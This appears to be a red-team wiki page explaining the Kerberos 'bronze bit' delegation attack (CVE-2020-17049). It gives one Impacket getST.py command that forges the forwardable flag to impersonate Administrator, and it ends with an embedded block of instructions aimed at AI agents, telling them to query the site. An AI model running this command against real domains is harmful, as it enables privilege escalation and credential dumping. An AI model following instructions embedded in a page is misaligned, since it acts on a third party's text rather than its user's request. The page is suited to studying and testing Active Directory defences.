# Bronze Bit ## Theory When abusing Kerberos delegations, S4U extensions usually come into play. One of those extensions is S4U2proxy. [Constrained](/ad/movement/kerberos/delegations/constrained.md) and [Resource-Based Constrained](/ad/movement/kerberos/delegations/rbcd.md) delegations rely on that extensions. A requirement to be able to use S4U2proxy is to use an additional service ticket as evidence (usually issued by after S4U2self request). That ticket needs to have the `forwardable` flag set. There are a few reasons why that flag wouldn't be set on a ticket * the "impersonated" user was member of the "Protected Users" group or was configured as "sensitive for delegation" * the service account configured for [constrained delegation](/ad/movement/kerberos/delegations/constrained.md) was configured for [Kerberos only/without protocol transition](/ad/movement/kerberos/delegations/constrained.md#without-protocol-transition) In 2020, the "bronze bit" (CVE-2020-17049) was released, allowing attackers to edit a ticket and set the `forwardable` flag. ## Practice The [Impacket](https://github.com/SecureAuthCorp/impacket) script [getST](https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py) (Python) can perform all the necessary steps to edit a ticket's flags and obtain a ticket through S4U2proxy to act as another user on a target service (in this case, "Administrator" is impersonated/delegated account but it can be any user in the environment). The input credentials are those of the compromised service account configured for constrained delegations. ```bash getST.py -force-forwardable -spn $Target_SPN -impersonate Administrator -dc-ip $Domain_controller -hashes :$Controlled_service_NThash $Domain/$Controlled_service_account ``` The SPN (ServicePrincipalName) set will have an impact on what services will be reachable. For instance, `cifs/target.domain` or `host/target.domain` will allow most remote dumping operations (more info on [adsecurity.org](https://adsecurity.org/?page_id=183)). ## Resources {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://red.infiltr8.io/ad/movement/kerberos/delegations/bronze-bit.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.